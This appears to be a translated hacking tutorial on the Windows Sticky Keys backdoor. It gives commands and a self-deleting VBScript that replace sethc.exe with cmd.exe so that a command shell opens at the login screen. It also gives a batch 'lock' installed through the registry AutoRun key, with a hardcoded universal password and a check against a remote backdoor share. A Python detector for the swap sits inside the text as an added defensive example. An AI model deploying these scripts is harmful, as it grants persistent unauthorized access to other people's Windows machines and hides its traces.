Backdoor principle:
On Windows 2000/XP/Vista, pressing the SHIFT key 5 times opens Sticky Keys by running sethc.exe, and this also works on the login screen. As with the Windows screensaver trick, once that program has been replaced with cmd.exe, the same key sequence opens a shell.
XP:
Eject the installation source CD (or rename the installation directory on your hard disk)
cd %windir%\system32\dllcache
ren sethc.exe *.ex~
cd %windir%\system32
copy /y cmd.exe sethc.exe
Vista:
takeown /f C:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /g Administrator:f
Then replace the file using the XP method.
On the login screen, press SHIFT 5 times and a cmd shell comes up, and then ...
Backdoor Extensions:
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.Run("cmd /c takeown /f %systemroot%\system32\sethc.exe", 0, True)
success = obj.Run("cmd /c echo y| cacls %systemroot%\system32\sethc.exe /g %username%:f", 0, True)
success = obj.Run("cmd /c copy %systemroot%\system32\cmd.exe %systemroot%\system32\acmd.exe", 0, True)
success = obj.Run("cmd /c copy %systemroot%\system32\sethc.exe %systemroot%\system32\asethc.exe", 0, True)
success = obj.Run("cmd /c del %systemroot%\system32\sethc.exe", 0, True)
success = obj.Run("cmd /c ren %systemroot%\system32\acmd.exe sethc.exe", 0, True)
The second command is the most interesting: the automatic answer .... I've had a similar problem before.
Updated again: added self-deletion and simplified the code ...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.Run("cmd /c takeown /f %systemroot%\system32\sethc.exe&echo y| cacls %systemroot%\system32\sethc.exe /g %username%:f&copy %systemroot%\system32\cmd.exe %systemroot%\system32\acmd.exe&copy %systemroot%\system32\sethc.exe %systemroot%\system32\asethc.exe&del %systemroot%\system32\sethc.exe&ren %systemroot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
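A defender-side check for the swap described above, as an added example that is not part of the original page: it hashes sethc.exe against cmd.exe in a given System32 directory (live host or mounted image) and looks for the asethc.exe and sethc.ex~ leftovers that the commands above create. The helper and function names are assumptions made for this example.

```python
import hashlib
import os

# Added example; helper and function names are illustrative, not from the page.
def _find(directory, name):
    """Case-insensitive lookup, so a Windows volume mounted on Linux also works."""
    try:
        for entry in os.listdir(directory):
            if entry.lower() == name.lower():
                return os.path.join(directory, entry)
    except OSError:
        pass
    return None

def _sha256(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def audit_sethc(system32):
    """Return a list of findings for the sethc.exe swap described on this page."""
    findings = []
    sethc = _find(system32, "sethc.exe")
    cmd = _find(system32, "cmd.exe")
    if sethc is None:
        findings.append("sethc.exe is missing")
    elif cmd is not None and _sha256(sethc) == _sha256(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe")
    # Leftovers named in the page's commands: the asethc.exe backup copy
    # and the dllcache copy renamed to sethc.ex~.
    if _find(system32, "asethc.exe"):
        findings.append("backup copy asethc.exe present")
    dllcache = _find(system32, "dllcache")
    if dllcache and _find(dllcache, "sethc.ex~"):
        findings.append("dllcache copy renamed to sethc.ex~")
    return findings

if __name__ == "__main__":
    root = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    for finding in audit_sethc(root):
        print("[!]", finding)
```

On 64-bit Windows run it with a 64-bit Python, since a 32-bit process is redirected from System32 to SysWOW64.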
Backdoor lock extension:
Note from allyesno: the CMD lock can be used for cmd shell password verification.
To lock the door, save the batch code below as Bdlock.bat.
You can then modify the registry as follows:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun" = "Bdlock.bat"
Bdlock.bat:
@echo off
title Door Login Verification
color A
cls
set temprandom=%random%
echo Please enter a CAPTCHA:%temprandom%
set /p check=
if "%check%"=="%temprandom%%temprandom%" goto Passcheck
if "%check%"=="%temprandom%" (
REM Backdoor server authentication
REM If there is no backdoor authentication server, comment out the next line with REM
if exist \\192.168.8.8\backdoor$\pass goto Passcheck
)
echo Validation failed
pause
exit
:Passcheck
echo Validation Succeeded
if "%passcmdlock%"=="http://blog.csdn.net/freexploit/" goto EndX
set passcmdlock=http://blog.csdn.net/freexploit/
:Allyesno
set errorlevel=>nul
echo Please enter a validation password?
set password=allyesno is a Pig>nul
set /p password=
REM Universal password
if "%password%"=="Allyesno is a sb" goto EndX
if %time:~1,1%==0 set timechange=a
if %time:~1,1%==1 set timechange=b
if %time:~1,1%==2 set timechange=c
if %time:~1,1%==3 set timechange=d
if %time:~1,1%==4 set timechange=e
if %time:~1,1%==5 set timechange=f
if %time:~1,1%==6 set timechange=g
if %time:~1,1%==7 set timechange=h
if %time:~1,1%==8 set timechange=i
if %time:~1,1%==9 set timechange=j
set /a sum=%time:~1,1%+%time:~1,1%
set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$" >nul
if "%errorlevel%"=="0" cls&echo password correct &goto End
echo please contact customer service for correct password! &goto Allyesno
:End
set password=>nul
set errorlevel=>nul
Echo
:EndX